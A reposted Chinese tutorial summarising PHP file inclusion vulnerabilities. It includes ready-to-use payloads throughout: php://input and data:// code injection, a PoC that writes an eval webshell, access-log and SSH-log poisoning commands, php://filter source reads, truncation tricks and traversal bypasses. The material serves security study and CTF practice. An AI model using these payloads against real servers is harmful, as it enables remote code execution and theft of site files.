文件包含漏洞相关知识总结

admin 2022年4月8日09:00:13评论34 views字数 6855阅读22分51秒阅读模式


1. 文件包含漏洞概念


  1. 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入

2. 文件包含漏洞的环境要求


  1. allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据
  2. allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件

3. 常见文件包含函数


include()和require()区别

include在引入不存文件时产生一个警告且脚本还会继续执行,require则会导致一个致命性错误且脚本停止执行

新建include.php文件

<?php$a='phpinfo1.php';#包含不存在的文件include $a;#require $a;echo "123";?>

运行结果:require包含不会显示123

文件包含漏洞相关知识总结

  1. require_once和include_once该文件中已经被包含过,则不会再次包含


4. PHP伪协议在文件包含漏洞中的利用


4.1. php://input

  1. php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行

如果存在文件包含漏洞,可将php://input作为文件名传入,同时在post中注入设置想要注入的代码,php执行时就会将post的内容作为php代码执行


4.1.1. 使用条件

  1. allow_url_fopen:off/on

  2. allow_url_include:on


4.1.2. 实例


<meta charset="utf8"><?phperror_reporting(0);$file=$_GET["file"];if(stristr($file,"php://filter")||stristr($file,"zip://")||stristr($file,"phar://")||stristr($file,"data:")){exit('hacker!');}if($file){    if($file!="http://www.baidu.com")echo"tips:flag在当前目录的某个文件中";    include($file);}else{    echo'click go baidu';}?>


执行任意代码poc:


?file=php://inputpost数据:<?php phpinfo(); ?>


写入木马poc:


?file=php://inputpost数据:<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>


读取目录结构poc:


?file=php://inputpost数据:post数据:<?php print_r(scandir('/var/www/html'));?>


4.2. data://


4.2.1. poc


data://[<MIME-type>][;charset=<encoding>][;base64],<data>?file=data://,<?php phpinfo();?file=data://text//plain,<?php phpinfo();?file=data://text/plain;base64,xxxxxxxxx?file=data:text/plain,</php phpinfo();?file=data:text/plain;base64,xxxxxxxxxx


4.2.2.file://,zip://,compress.zlib://和bzip2://


4.3.1. 使用条件

  1. allow_url_fopen:off/on

  2. allow_url_include:off/on

  3. file://用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响(相同类型的还有zip://,zlib://和bzip2://)

  4. file://必须是绝对路径


4.3.2. poc


以zip://为例

要用#分隔压缩包和压缩包里的内容,并且#要用url编码%23

http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23code.txt

先将要执行的PHP代码写好文件名为code.txt,将phpcode.txt进行zip压缩,压缩文件名为file.zip,如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。


4.4. phar://


4.4.1. poc

phar://...(当前脚本的绝对路径).../1.zip/1.php


4.5. php://filter

php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件行。所以我们一般对其进行编码,让其不执行。从而导致任意文件读取。


poc:


?file=php://filter/resource=xxx.php?file=php://filter/read=convert.base64-encode/resource=xxx.php?file=php://filter/convert.base64-encode/resource=xxx.php #可绕过过滤了操作名read的waf?file=php://filter/read=convert.base64-encode/resource=xxx.php #可用重写resource绕过正则为"/resource=*.jpg/i"的waf


4.6. 总结

php://input和data://可以注入任意代码;file://,zip://,zlib://,bzip2://,phar,php://filter可用于读取文件,可以结合文件上传漏洞进行利用。


5. 文件包含漏洞的截断


5.1. %00截断

5.1.1. 要求

  1. php版本小于5.3.4

  2. magic_quotes_gpc为off状态

magic_quotes_gpc为on状态时%00前会被自动加上一个反斜杠转义


5.1.2. 实例

index.php


<?phpif(empty($_GET["file"])){echo('../flag.php');return;}else{$filename='pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").'.html';//限制了只能访问.html后缀名的文件,如果想访问.php后缀名的文件就需要截断后面的.htmlinclude $filename;}?>


poc

index.php?file=../../flag.php%00


5.2. 路径长度截断


5.2.1. 要求

  1. php版本小于5.2.8


5.2.2. 操作系统文件长度限制

  1. windows 259个bytes

  2. linux 4096个bytes


5.2.3. 实例

index.php


<?phpif(empty($_GET["file"])){echo('../flag.php');return;}else{$filename='pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").'.html';//限制了只能访问.html后缀名的文件,如果想访问.php后缀名的文件就需要阶段后面的.htmlinclude $filename;}?>


5.2.4. poc

windows:

poc1:file=../../flag.php..............................................................................................................................................................................................................................................

poc2:file=../../flag.php./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././


5.3. 总结


一般来说如果php版本在5.3.4以下,先尝试使用%00截断,如果不行再使用路径长度截断


6. 包含Apache日志文件


WEB服务器一般会将用户的访问记录保存在访问日志中。那么我们可以根据日志记录的内容,精心构造请求,把PHP代码插入到日志文件中,通过文件包含漏洞来执行日志中的PHP代码。


6.1. 使用条件

  1. 对日志文件可读

  2. 知道日志文件存储目录

  3. curl命令行url请求工具(避免url转码的存在)


6.2. 获取日志存放路径

日志默认路径

(1) apache+Linux日志默认路径

/etc/httpd/logs/access_log

/var/log/httpd/access_log

(2) apache+win2003日志默认路径

D:xamppapachelogsaccess.log

D:xamppapachelogserror.log

(3) IIS6.0+win2003默认日志文件

C:WINDOWSsystem32Logfiles

(4) IIS7.0+win2003 默认日志文件

%SystemDrive%inetpublogsLogFiles

(5) nginx 日志文件

日志文件在用户安装目录logs目录下

以我的安装路径为例/usr/local/nginx,

那我的日志目录就是在/usr/local/nginx/logs里


6.3. 利用方式

使用浏览器访问特殊字符会被编码,可以使用curl避免特殊字符被编码,但是需要注意的是[ ]在curl是特殊符号,需要进行转义 ,不然curl使用时会报错


curl -v "http://xxxxx/file.php?page=<?php @eval($_POST[123]);?>"?page=<?php @eval($_POST[123]);?>"



7. 包含SSH log 日志


7.1. 利用条件

需要知道ssh-log的位置,且可读。默认情况下为 /var/log/auth.log


7.2. 利用方式

  1. 首先使用ssh连接

    ssh '<?php phpinfo(); ?>'@remotehost

  1. 然后随意输入密码

  2. 最后结合文件包含漏洞即可利用


8. 包含SESSION


8.1. 利用条件

  1. 找到Session内的可控变量

  2. Session文件可读写,并且知道存储路径

    php的session文件的保存路径可以在phpinfo的session.save_path看到

8.2. session常见存储路径

  1. /var/lib/php/sess_PHPSESSID

  2. /var/lib/php/sess_PHPSESSID

  3. /tmp/sess_PHPSESSID

  4. /tmp/sessions/sess_PHPSESSID

  5. session文件格式:sess_[phpsessid] ,而 phpsessid 在发送的请求的 cookie 字段中可以看到


9. 包含environ


利用条件:

php以cgi方式运行,这样environ才会保持UA头。

environ文件存储位置已知,且environ文件可读。

姿势:

/proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码,则php代码会被写入到中。之后再包含它即可。


10. 包含/proc/self/fd/[environreferer]


apache的错误日志可能包含在/proc/self/fd/[envrionreferer],例如/proc/self/fd/2,/proc/self/fd/3,/proc/self/fd/10,可以使用burpsuite的测试器模块fuzz出该文件结构

fuzz字典:

/proc/self/cmdline

/proc/self/stat

/proc/self/status

/proc/self/fd/0

/proc/self/fd/1

/proc/self/fd/2

/proc/self/fd/3

/proc/self/fd/4

/proc/self/fd/5

/proc/self/fd/6

/proc/self/fd/7

/proc/self/fd/8

/proc/self/fd/9

/proc/self/fd/10

/proc/self/fd/11

/proc/self/fd/12

/proc/self/fd/13

/proc/self/fd/14

/proc/self/fd/15

/proc/self/fd/16

/proc/self/fd/17

/proc/self/fd/18

/proc/self/fd/19

/proc/self/fd/20

/proc/self/fd/21

/proc/self/fd/22

/proc/self/fd/23

/proc/self/fd/24

/proc/self/fd/25

/proc/self/fd/26

/proc/self/fd/27

/proc/self/fd/28

/proc/self/fd/29

/proc/self/fd/30

/proc/self/fd/31

/proc/self/fd/32

/proc/self/fd/33

/proc/self/fd/34

/proc/self/fd/35


11. 包含临时文件


php中上传文件,会创建临时文件。在linux下使用/tmp目录,而在windows下使用c:winsdowstemp目录。在临时文件被删除之前,利用竞争即可包含该临时文件。

由于包含需要知道包含的文件名。一种方法是进行暴力猜解,linux下使用的随机函数有缺陷,而window下只有65535中不同的文件名,所以这个方法是可行的。

另一种方法是配合phpinfo页面的php variables,可以直接获取到上传文件的存储路径和临时文件名,直接包含即可。这个方法可以参考LFI With PHPInfo Assistance


12. 其他包含姿势


  1. 包含stmp日志

  2. 包含xss

  3. 包含上传文件


13. 文件包含漏洞的绕过方法


13.1. 特定前缀绕过

13.1.1. 目录遍历

使用 …/…/ 来返回上一目录,被称为目录遍历(Path Traversal)。例如 ?file=…/…/phpinfo/phpinfo.php

13.1.2. 编码绕过

服务器端常常会对于…/等做一些过滤,可以用一些编码来进行绕过。

服务器端常常会对于…/等做一些过滤,可以用一些编码来进行绕过。

1.利用url编码

    /%2e%2e%2f...%2f%2e%2e/
    %2e%2e%5c...%5c%2e%2e

2.二次编码


    /%252e%252e%252f/%252e%252e%255c

  1. 13.2. 指定后缀绕过


13.2.1. query(?)

[访问参数] ?file=http://localhost:8081/phpinfo.php?

[拼接后]  ?file=http://localhost:8081/phpinfo.php?.txt

?将后面的.txt截断,web服务器会认为.txt是一个新的参数

13.2.2. fragment(#)

[访问参数] ?file=http://localhost:8081/phpinfo.php%23

[拼接后]  ?file=http://localhost:8081/phpinfo.php#.txt

13.2.3. zip://

[访问参数] ?file=zip://D:zip.jpg%23phpinfo

[拼接后]  ?file=zip://D:zip.jpg#phpinfo.txt

13.2.4. phar://

[访问参数] ?file=phar://zip.zip/phpinfo

[拼接后]  ?file=phar://zip.zip/phpinfo.txt


转载:https://blog.csdn.net/qq_27710251/article/details/108039876

原文始发于微信公众号(天驿安全):文件包含漏洞相关知识总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月8日09:00:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   文件包含漏洞相关知识总结http://cn-sec.com/archives/867237.html

发表评论

匿名网友 填写信息